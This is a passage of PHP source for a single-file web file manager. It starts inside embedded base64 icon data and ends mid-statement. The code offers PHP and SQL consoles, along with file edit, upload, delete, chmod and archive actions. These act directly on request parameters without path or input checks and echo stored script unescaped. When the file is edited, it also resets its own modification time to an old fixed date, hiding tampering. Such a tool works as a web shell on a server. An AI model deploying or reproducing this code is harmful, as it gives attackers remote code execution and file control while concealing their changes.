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"); } .file { background-image: url("data:image/png;base64,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"); } <?=fm_home_style()?> .img { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII="); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php $url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr> '.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <script src="https://cdn.jsdelivr.net/gh/Den1xxx/EditArea@master/edit_area/edit_area_full.js"></script> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="25" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <script language="Javascript" type="text/javascript"> document.addEventListener('DOMContentLoaded', function() { editAreaLoader.init({ id: "newcontent" ,display: "later" ,start_highlight: true ,allow_resize: "both" ,allow_toggle: true ,word_wrap: true ,language: "ru" ,syntax: "<?=pathinfo($_REQUEST['edit'], PATHINFO_EXTENSION)?>" ,toolbar: "search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help" ,syntax_selection_allow: "css,html,js,php,python,xml,c,cpp,sql,basic,pas" }); }); </script> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg .= (__('File updated')); else $msg .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //Let's rock! $msg = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg .= __('Error occurred'); } else { $msg .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_POST['search_recursive'])) { ini_set('max_execution_time', '0'); $search_data = find_text_in_files($_POST['path'], $_POST['mask'], $_POST['search_recursive']); if(!empty($search_data)) { $msg .= __('Found in files').' ('.count($search_data).'):<br>'; foreach ($search_data as $filename) { $msg .= '<a href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a> '; } } else { $msg .= __('Nothing founded'); } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. 